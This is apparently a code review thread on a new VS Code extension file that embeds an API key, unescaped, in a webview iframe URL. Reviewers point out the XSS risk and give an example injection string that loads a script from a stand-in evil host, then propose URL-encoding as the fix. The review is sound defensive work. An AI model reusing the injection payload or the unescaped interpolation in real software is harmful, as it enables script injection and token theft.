src/webview.ts

```diff
@@ -0,0 +1,58 @@
+import * as vscode from 'vscode';
+
+// Helper function to create and show webview with authentication
+export function createAuthenticatedWebview(
+  url: string,
+  viewType: string,
+  title: string
+): vscode.WebviewPanel {
+  const apiKey = vscode.workspace.getConfiguration('kaas-vscode').get<string>('apiKey');
+  const authUrl = `${url}?api-token=${apiKey}`;
+
+  const panel = vscode.window.createWebviewPanel(viewType, title, vscode.ViewColumn.One, {
+    enableScripts: true,
+    retainContextWhenHidden: true,
+  });
+
+  panel.webview.html = `
+      <!DOCTYPE html>
+      <html>
+      <head>
+          <meta charset="UTF-8">
+          <meta name="viewport" content="width=device-width, initial-scale=1.0">
+          <title>${title}</title>
+          <style>
+              body, html { margin: 0; padding: 0; height: 100%; overflow: hidden; }
+              iframe { width: 100%; height: 100vh; border: none; }
+          </style>
+          <script>
+              const vscode = acquireVsCodeApi();
+              
+              // Listen for messages from the iframe
+              window.addEventListener('message', (event) => {
+                  if (event.data && event.data.type === 'openExternal') {
+                      vscode.postMessage({
+                          command: 'openExternal',
+                          url: event.data.url
+                      });
+                  }
+              });
+          </script>
+      </head>
+      <body>
+          <iframe src="${authUrl}"></iframe>
```

Comment:
Should the URL be HTML-escaped? If an attacker can spoof the `kaas-vscode.apiKey`, there is a chance of an XSS attack.

Reply:
Passing the API token in the URL is not the problem per se, but we need to encode the API key. Consider the case where somebody set the value for `kaas-vscode.apiKey` to a malicious string like this `"></iframe><script src="https://example.com/evil-script.js" />`.

It would be safer to use [encodeURIComponent](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/encodeURIComponent) to mask the key:

```
const authUrl = `${url}?api-token=${encodeURIComponent(apiKey)}`;
```